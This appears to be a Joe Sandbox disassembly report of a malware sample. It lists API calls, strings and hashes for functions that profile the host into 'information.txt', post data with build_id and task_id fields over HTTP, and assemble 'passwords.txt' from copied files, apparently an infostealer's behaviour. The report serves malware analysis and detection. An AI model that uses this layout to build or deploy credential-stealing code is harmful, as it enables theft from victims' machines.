Part of subcall function 0040FBC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
Part of subcall function 0040FBC0: HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
Part of subcall function 0040FBC0: GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
Part of subcall function 0040FBC0: wsprintfA.USER32 ref: 0040FC12

Part of subcall function 0040FD30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
Part of subcall function 0040FD30: HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
Part of subcall function 0040FD30: RegOpenKeyExA.KERNEL32(80000002,024F9050,00000000,00020119,00000000), ref: 0040FD6B
Part of subcall function 0040FD30: RegQueryValueExA.KERNEL32(00000000,0251E110,00000000,00000000,00000000,000000FF), ref: 0040FD86
Part of subcall function 0040FD30: RegCloseKey.ADVAPI32(00000000), ref: 0040FD90

Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE02
Part of subcall function 0040FDE0: GetLastError.KERNEL32(?,00000030), ref: 0040FE10
Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE48
Part of subcall function 0040FDE0: wsprintfA.USER32 ref: 0040FE92

Part of subcall function 0040FDA0: GetSystemInfo.KERNEL32(00000000), ref: 0040FDAD
Part of subcall function 0040FDA0: wsprintfA.USER32 ref: 0040FDC3

Part of subcall function 0040FED0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
Part of subcall function 0040FED0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
Part of subcall function 0040FED0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
Part of subcall function 0040FED0: wsprintfA.USER32 ref: 0040FF2B

Part of subcall function 00410200: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
Part of subcall function 00410200: Process32First.KERNEL32(00000000,00000128), ref: 00410238
Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041024A
Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
Part of subcall function 00410200: CloseHandle.KERNEL32(00000000), ref: 004102A9

Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,024F6730,00000000,00020019,00000000,004201E9), ref: 00410009

Part of subcall function 0040FFC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
Part of subcall function 0040FFC0: wsprintfA.USER32 ref: 0041007C
Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,0251D8E0,00000000,000F003F,?,00000400), ref: 004100CA
Part of subcall function 0040FFC0: lstrlenA.KERNEL32(?), ref: 004100DF
Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,0251D748,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156

lstrlenA.KERNEL32(00000000,00000000,?,00423684,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414F07

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Strings

Work Dir: In memory, xrefs: 00414783
Processor: , xrefs: 00414BC4
Display Resolution: , xrefs: 004149E8
Computer Name: , xrefs: 0041491A
RAM: , xrefs: 00414CF9
[Processes], xrefs: 00414DD6
TimeZone: , xrefs: 00414B3B
Keyboard Languages: , xrefs: 00414A5E
[Hardware], xrefs: 00414BA2
GUID: , xrefs: 0041461A
VideoCard: , xrefs: 00414D60
Version: , xrefs: 004144C3
MachineID: , xrefs: 004145B3
Threads: , xrefs: 00414C92
Install Date: , xrefs: 0041482E
[Software], xrefs: 00414E4C
Windows: , xrefs: 004147C7
Path: , xrefs: 00414706
Date: , xrefs: 0041454C
Local Time: , xrefs: 00414AD4
HWID: , xrefs: 00414690
AV: , xrefs: 004148A4
information.txt, xrefs: 00414F1C
User Name: , xrefs: 00414981
Cores: , xrefs: 00414C2B

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$Open$CloseCreateInformationInitializeQueryValuelstrcpy$LocalNameProcess32lstrlen$BlanketCurrentHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryEnumErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 2672074340-1014693891
Opcode ID: 0d77c7a35f28ee7f2e3b6a2c3eb6280452e04d3c9f21196f6622b304b4d1b73b
Instruction ID: ed390803ddffb7dbb27509b1d163b9a87a989646b63db68027920e85455424b0
Opcode Fuzzy Hash: 0d77c7a35f28ee7f2e3b6a2c3eb6280452e04d3c9f21196f6622b304b4d1b73b
Instruction Fuzzy Hash: 2D623073D101086EDB15FBA1D952DDEB3789E14304B6482BFB112728D2AF397B0DCA69

Function 00405220 Relevance: 48.0, APIs: 21, Strings: 6, Instructions: 753
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004052AC
StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,00000000), ref: 004052C7
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040540D
HttpOpenRequestA.WININET(00000000,0251B668,?,0251D9A0,00000000,00000000,-00400100,00000000), ref: 00405449
lstrlenA.KERNEL32(00000000,00000000,004138CC,?,00000000,004138CC,",00000000,004138CC,status,00000000,004138CC,024F8D50,00000000,004138CC,00423358), ref: 004059B3
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059C4
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059CF
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059D6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059E7
memcpy.MSVCRT ref: 004059F8
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405A09
lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405A22
memcpy.MSVCRT ref: 00405A2B
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405A3E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405A4F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405A66
InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 00405AB5
InternetCloseHandle.WININET(00000000), ref: 00405AC0
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040546D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

InternetCloseHandle.WININET(00000000), ref: 00405ACA
InternetCloseHandle.WININET(00000000), ref: 00405AD7

Strings

", xrefs: 00405520, 00405630, 00405741, 00405851, 00405964
build_id, xrefs: 0040560E
------, xrefs: 00405332, 00405473, 00405585, 00405697, 004057A6, 004058B9
task_id, xrefs: 0040582F
mode, xrefs: 0040571F
status, xrefs: 00405942

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$------$build_id$mode$status$task_id
API String ID: 530647464-4141295817
Opcode ID: b93c99284bbc12be903414906da44d4ddf7db8284e5a9b85deddb4f24ddcf4ac
Instruction ID: 5e4698c0f8782886daf2421da86d2cafb9983bd3f54ffb23d2de9c830c1f077e
Opcode Fuzzy Hash: b93c99284bbc12be903414906da44d4ddf7db8284e5a9b85deddb4f24ddcf4ac
Instruction Fuzzy Hash: 7C52DE72910109AEDB15FBA1DC92EEE7778AF14704F54817EB112724D1EF382B4DCAA8

Function 00405BB0 Relevance: 44.3, APIs: 21, Strings: 4, Instructions: 584
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,00000030), ref: 00405C57
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405D9D
HttpOpenRequestA.WININET(00000000,0251B668,?,0251D9A0,00000000,00000000,-00400100,00000000), ref: 00405DD9
lstrlenA.KERNEL32(00000000,00000000,00416BDF,?,00000000,00416BDF,",00000000,00416BDF,mode,00000000,00416BDF,024F8D50,00000000,00416BDF,00423358), ref: 0040611D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 0040612E
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406139
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406140
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406151
memcpy.MSVCRT ref: 00406162
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00406173
lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0040618C
memcpy.MSVCRT ref: 00406195
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004061A8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004061B9
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004061D0
InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 00406225
InternetCloseHandle.WININET(00000000), ref: 00406230
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405DFD

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

InternetCloseHandle.WININET(00000000), ref: 0040623A
InternetCloseHandle.WININET(00000000), ref: 00406247

Strings

", xrefs: 00405EB0, 00405FC0, 004060D1
build_id, xrefs: 00405F9E
------, xrefs: 00405CC2, 00405E03, 00405F15, 00406027
mode, xrefs: 004060AF

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$------$build_id$mode
API String ID: 530647464-3829489455
Opcode ID: 780af51b77e92f6a8107d8b7c553ffc728ae17864558bceb5827b898e0ee14bf
Instruction ID: 2342e7445195f74e1bbe978696abae846b25583d2ac747dccbea70769e672dee
Opcode Fuzzy Hash: 780af51b77e92f6a8107d8b7c553ffc728ae17864558bceb5827b898e0ee14bf
Instruction Fuzzy Hash: 1222EE72910108AEDB15FBA1DC92EEE7778AF54704F54817EB502724D1EF386A0DCBA8

Function 0040BF30 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 286
stringfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,024F8CF0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C069
RtlAllocateHeap.NTDLL(00000000), ref: 0040C070
lstrlenA.KERNEL32(00000000,00000000), ref: 0040C10C
lstrcatA.KERNEL32(00000000,0251B758), ref: 0040C123
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C133
lstrcatA.KERNEL32(00000000,004234BC), ref: 0040C13F
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C14F

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1

lstrcatA.KERNEL32(00000000,004234B8), ref: 0040C15B
lstrcatA.KERNEL32(00000000,0251B808), ref: 0040C169
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C179
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C185
lstrcatA.KERNEL32(00000000,0251B8E8), ref: 0040C192
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1A2
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1AE
lstrcatA.KERNEL32(00000000,0251D448), ref: 0040C1BC
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1CC
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1D8
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1E4
lstrlenA.KERNEL32(00000000), ref: 0040C211
DeleteFileA.KERNEL32(00000000), ref: 0040C275

Strings

passwords.txt, xrefs: 0040C21E

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
String ID: passwords.txt
API String ID: 2344884248-347816968
Opcode ID: ff5052ec77d4df1a9c86cd80e0b29353f95ee7cb8f6a71fce438e1d8faa092ec
Instruction ID: 967a70a3d716286beb5b4252a3fafd026a216bdc4be784f124d06add54286a45
Opcode Fuzzy Hash: ff5052ec77d4df1a9c86cd80e0b29353f95ee7cb8f6a71fce438e1d8faa092ec
Instruction Fuzzy Hash: DBA14D72A00105ABCB14FBA1ED5ADEE377DAF54305F149039F502B2591EF386A09CBB9

Function 00407160 Relevance: 32.0, APIs: 21, Instructions: 482stringfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FA20: StrCmpCA.SHLWAPI(?,00423410,?,004090A5,00423410,00000000), ref: 0040FA2A

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040725E
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040744B
RtlAllocateHeap.NTDLL(00000000), ref: 00407452
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00407292

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

lstrcatA.KERNEL32(00000000,00000000,00000000,0251B898,00423410,0251B898,00423410,00000000), ref: 0040757D
lstrcatA.KERNEL32(00000000,0042340C), ref: 00407589
lstrcatA.KERNEL32(00000000,00000000), ref: 00407599
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075A5
lstrcatA.KERNEL32(00000000,00000000), ref: 004075B5
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075C1
lstrcatA.KERNEL32(00000000,00000000), ref: 004075D1
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075DD
lstrcatA.KERNEL32(00000000,00000000), ref: 004075ED
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075F9
lstrcatA.KERNEL32(00000000,00000000), ref: 00407609
lstrcatA.KERNEL32(00000000,0042340C), ref: 00407615
lstrcatA.KERNEL32(00000000,00000000), ref: 00407652
lstrcatA.KERNEL32(00000000,00423408), ref: 00407666
lstrlenA.KERNEL32(00000000), ref: 004076B3
lstrlenA.KERNEL32(00000000), ref: 004076BF

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

DeleteFileA.KERNEL32(00000000,?,?,?,004201E9), ref: 0040771A

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$File$CopyHeap$AllocateDeleteProcess
String ID:
API String ID: 510441641-0
Opcode ID: ba727aef810989b6c75763a87316421aa1657061677df23325a5051ec488d916
Instruction ID: 7c427e6bb88bbe56a8d38efa81964618216df7dc27c3b8011e4d2415417106fc
Opcode Fuzzy Hash: ba727aef810989b6c75763a87316421aa1657061677df23325a5051ec488d916
Instruction Fuzzy Hash: 82026D72A10104ABCB24FBA1DC56DEE7779AF10305F54813AF506764E2EF386A0DCB69

Function 00408DD0 Relevance: 31.9, APIs: 21, Instructions: 390stringfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,024F8CF0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408FC9
lstrcatA.KERNEL32(00000000,00000000,0251B898,00423410,0251B898,00423410,00000000), ref: 004090F3
lstrcatA.KERNEL32(00000000,0042340C), ref: 004090FF
lstrcatA.KERNEL32(00000000,00000000), ref: 0040910F
lstrcatA.KERNEL32(00000000,0042340C), ref: 0040911B
lstrcatA.KERNEL32(00000000,00000000), ref: 0040912B
